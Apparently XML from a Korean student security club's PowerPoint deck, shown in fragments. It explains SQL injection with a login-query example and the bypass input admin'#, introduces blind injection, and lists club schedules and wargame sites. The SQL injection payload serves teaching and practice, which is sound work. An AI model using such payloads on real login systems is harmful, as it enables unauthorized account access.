                </a:rPr>
                <a:t>FROM </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>계정정보</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>WHERE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>ID = ‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>admin</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>and PWD = ‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1234</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32345321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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>인젝션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(injection)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err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>WebRequest</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> @{ ID</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>admin’#</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>PASSWORD :</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> 1234 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>}</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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ID</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> 가 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>admin ?</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>어 있어 여기 계정정보</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="120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사용자</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(client)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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로그인 성공</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>!</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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SELECT </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" err="1">
                  <a:solidFill>
                    <a:srgbClr val="009400"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>user_name</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="009400"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>FROM </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>계정정보</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>WHERE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>ID = ’</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>admin’#</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>and PWD = ‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1234</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28066255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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>블라인드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>인젝션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(blind 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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>블라인드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>인젝션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(blind 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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>쌍쌍바</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>죠스바</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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a:t>프로그래밍반 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>( - )</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>정보보호반 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>( 3~9</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>명 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3144665978"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4232814">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:endParaRPr lang="en-US" altLang="ko-KR"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:endParaRPr lang="en-US" altLang="ko-KR"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:endParaRPr lang="en-US" altLang="ko-KR"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:endParaRPr lang="en-US" altLang="ko-KR"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:endParaRPr lang="en-US" altLang="ko-KR"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:endParaRPr lang="en-US" altLang="ko-KR"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2800"/>
                        <a:t>3/19 (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="2800"/>
                        <a:t>금</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2800"/>
                        <a:t>) 1900</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="2800"/>
                        <a:t>시</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2800"/>
                        <a:t> OT </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="2800"/>
                        <a:t>진행</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2800"/>
                        <a:t>!</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:endParaRPr lang="en-US" altLang="ko-KR"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US">
                          <a:solidFill>
                            <a:schemeClr val="accent5">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>* </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR">
                          <a:solidFill>
                            <a:schemeClr val="accent5">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>3/19 1830</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US">
                          <a:solidFill>
                            <a:schemeClr val="accent5">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>시</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR">
                          <a:solidFill>
                            <a:schemeClr val="accent5">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Zoom </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US">
                          <a:solidFill>
                            <a:schemeClr val="accent5">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>방 번호 반장이 전파</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR">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a:t>임시 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
                        <a:t>위키방</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR">
                          <a:hlinkClick r:id="rId2"/>
                        </a:rPr>
                        <a:t>http://ko.nacker.wikidok.net/</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-K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a:t>반장 팀 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>: Team Red : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
                        <a:t>시스탬</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t> 해킹 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
                        <a:t>포너</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>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a:t>부반장 팀 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>: Team Blue : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>웹 해킹 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
                        <a:t>웹해커</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>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a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>http://pwnable.kr/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t> 1~5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>번</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>문제당 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>100</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>점</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-K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a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>https://webhacking.kr/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>  1~ 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>번 문제당 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>50</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>점</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-K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err="1"/>
                        <a:t>HackerSchoolFTZ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>  1 ~ 15</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>번</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>문제당 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>30</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>점</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-K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a:t>각 팀별로 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
                        <a:t>그주간</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t> 풀이를 발표</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>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a:t>발표가 끝나면</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>상대편에서 질문</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR"/>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/Plan/Circles</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>문화부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>계획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정보보호반</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>블라인드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>인젝션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(blind 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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>블라인드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>인젝션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(blind 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ID</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>admin </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>이고</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>데이터베이스 이름 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>번째 글자가 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>‘w’ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>면 로그인해줘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>!</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>어 있어 여기 계정정보</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
